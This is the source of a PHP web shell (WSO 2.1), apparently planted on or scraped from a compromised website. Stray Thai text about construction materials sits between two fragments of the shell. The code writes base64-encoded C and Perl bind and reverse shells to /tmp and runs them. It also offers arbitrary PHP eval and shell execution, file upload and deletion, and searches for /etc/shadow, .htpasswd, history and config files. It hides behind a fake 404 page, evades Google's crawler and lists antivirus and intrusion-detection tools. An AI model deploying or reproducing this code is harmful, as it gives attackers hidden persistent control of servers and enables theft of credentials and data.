aW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdG

RsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBz

LGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KIC

AgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSww

KTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORV

Q7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2lu

X2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydW

N0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGls

ZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw

0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3Jp

dGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCi

AgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBb

aV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV

0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAg

ICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgIC

B9DQp9";
   

$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYg

KEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0

lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50

IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRU

FERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8

IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbG

lzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgk

cGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKT

sNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJ

CW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0

9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAw

Ow0KCX0NCn0=";
    ?>
    <h1>Network tools</h1><div class=content>
    <form name='nfp' onSubmit="g

(null,null,this.using.value,this.port.value,this.pass.value);return

false;">
    <span>Bind port to /bin/sh</span><br/>
    Port: <input type='text' name='port' value='31337'> Password:

<input type='text' name='pass' value='wso'> Using: <select

name="using"><option value='bpc'>C</option><option

value='bpp'>Perl</option></select> <input type=submit value=">>">
    </form>
    <form name='nfp' onSubmit="g

(null,null,this.using.value,this.server.value,this.port.value);return

false;">
    <span>Back-connect to</span><br/>
    Server: <input type='text' name='server' value='<?=$_SERVER

['REMOTE_ADDR']?>'> Port: <input type='text' name='port'

value='31337'> Using: <select name="using"><option

value='bcc'>C</option><option value='bcp'>Perl</option></select>

<input type=submit value=">>">
    </form><br>
    <?php
    if(isset($_POST['p1'])) {
        function cf($f,$t) {
            $w=@fopen($f,"w") or @function_exists

('file_put_contents');
            if($w)    {
                @fwrite($w,@base64_decode($t)) or @fputs

($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
                @fclose($w);
            }
        }
        if($_POST['p1'] == 'bpc') {
            cf("/tmp/bp.c",$bind_port_c);
            $out = ex("gcc -o /tmp/bp /tmp/bp.c");
            @unlink("/tmp/bp.c");
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bp")."</pre>";
        }
        if($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl",$bind_port_p);
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bp.pl")."</pre>";
        }
        if($_POST['p1'] == 'bcc') {
            cf("/tmp/bc.c",$back_connect_c);
            $out = ex("gcc -o /tmp/bc /tmp/bc.c");
            @unlink("/tmp/bc.c");
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bc")."</pre>";
        }
        if($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl",$back_connect_p);
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']."

".$_POST['p3']." &");
            echo "<pre class=ml1>$out\n".ex("ps aux | grep

bc.pl")."</pre>";
        }
    }
    echo '</div>';
    printFooter();
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' .

$default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
?>
<div id="cot_tl_fixed"><marquee>Private Shell - Wireless crew &copy

Copyleft 2009 -Pro_Wikileaks </marquee></div>
Hacker-newbie.org </marquee></div>
ไม่มีข้อมูลวัสดุก่อสร้าง
ไม่มีข้อมูลเครื่องมือ/จักรกล
<?php
/* WSO 2.1 (Web Shell by pgems.in) */
$auth_pass = "202cb962ac59075b964b07152d234b70";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array',

$array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff;

}
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) ==

$auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();
 
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
    
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b

*config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system"

=> "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -

04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -

02000 -ls",
          "find config.inc.php files" => "find / -type f -name

config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name

\"config*\"",
          "find all writable folders and files" => "find / -perm -2 -

ls",
          "find all writable folders and files in current dir" =>

"find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name

service.pwd",
          "find service.pwd files in current dir" => "find . -type f

-name service.pwd",
          "find all .htpasswd files" => "find / -type f -name

.htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -

name .htpasswd",
          "find all .bash_history files" => "find / -type f -name

.bash_history",
          "find .bash_history files in current dir" => "find . -type f

-name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name

.fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f

-name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate

config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"   
    );
 
function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    ?>
<html><head><meta http-equiv='Content-Type' content='text/html;

charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404

Not Found Shell V.<?=VERSION?></title>
<style>
    body {background-color:#000;color:#fff;}
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-

align:top; }
    span,h1,a    { color:<?=$color?> !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px

5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow:

auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#00ff00;background-

color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier

New"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
    .main th    {text-align:left;}
    .main tr:hover{background-color:#5e5e5e;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-

size:12px;left:0px;padding:4px 0;clip:_top:expression

(document.documentElement.scrollTop+document.documentElement.clientHei

ght-this.clientHeight);_left:expression

(document.documentElement.scrollLeft +

document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements

[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {   
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-

form-urlencoded");
            req.send(params);
        } 
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-

www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } 
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST

['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?

htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?

htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?

htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?

$_POST['charset']:''?>'>
</form>
<?php
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    $millink='http://milw0rm.com/search.php?dong=';
    if( strpos('Linux', $kernel) !== false )
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6)

);
    else
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U',

'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST

['charset']==$item?'selected':'').'>'.$item.'</option>';
    $m = array('Sec.

Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql'

,'Php'=>'Php','Safe mode'=>'SafeMode','String

tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network')

;
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#"

onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\\'))
            $drives .= '<a href="#" onclick="g

(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%

><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS

['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a

href="http://www.google.com/search?q='.urlencode(@php_uname()).'"

target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>

[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span>

'.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span>

'.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?

=$color?><b>OFF</b></font>').' <a href=# onclick="g

(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span>

'.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).'

<span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/

$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS

['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS

['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g

(null,null,null,null,null,this.value)"><optgroup label="Page

charset">'.$opt_charsets.'</optgroup></select><br><span>Server

IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client

IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%

><tr>'.$menu.'</tr></table><div style="margin:5">';
}
 
function printFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[

Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return

false;"><span>Change dir:</span><br><input class="toolsInp" type=text

name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input

type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return

false;"><span>Read file:</span><br><input class="toolsInp" type=text

name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g

('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make

dir:</span><br><input class="toolsInp" type=text name=d><input

type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g

('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make

file:</span><br><input class="toolsInp" type=text name=f><input

type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
        <td><form onsubmit="g('Console',null,this.c.value);return

false;"><span>Execute:</span><br><input class="toolsInp" type=text

name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST

['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file

name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
 
</table>
</div>
</body></html>
<?php
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS

['disable_functions'], 'posix_getpwuid')===false) ) { function

posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS

['disable_functions'], 'posix_getgrgid')===false) ) { function

posix_getgrgid($p) { return false; } }
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
function viewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}
 
function perms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p &

0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p &

0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p &

0x0200) ? 'T' : '-'));
    return $i;
}
function viewPermsColor($f) { 
    if (!@is_readable($f))
        return '<font color=#FF0000><b>'.perms(@fileperms

($f)).'</b></font>';
    elseif (!@is_writable($f))
        return '<font color=white><b>'.perms(@fileperms

($f)).'</b></font>';
    else
        return '<font color=#00BB00><b>'.perms(@fileperms

($f)).'</b></font>';
}
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
function actionSecInfo() {
    printHeader();
    echo '<h1>Server security information</h1><div class=content>';
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "\n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }
    
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS

['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get

('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get

('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists

('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';
    
    if( $GLOBALS['os'] == 'nix' ) {
        $userful = array

('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip

','bzip','bzip2','nc','locate','suidperl');
        $danger = array

('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','c

hkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort

','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','

zmbscap','sawmill','wormscan','ninja');
        $downloaders = array

('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable

('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\",

\"passwd\")'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable

('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\",

\"shadow\")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents

('/proc/version'));
        showSecParam('Distr name', @file_get_contents

('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item) 
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents

('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',ex('ver')); 
        showSecParam('Account Settings',ex('net accounts')); 
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}
 
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById

('PhpOutput').style.display='';document.getElementById

('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean

()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit; 
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th

{$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!

msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form

name=pf method=post onsubmit="if(this.ajax.checked){a

(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}

return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty

($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input

type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5

($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using

AJAX</form><pre id=PhpOutput style="'.(empty($_POST

['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    printFooter();
}
 
function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'],

$_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename

($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_SESSION['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f,

$d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS

['cwd']);                   
                } elseif($_SESSION['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f,

$d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS

['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')

||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
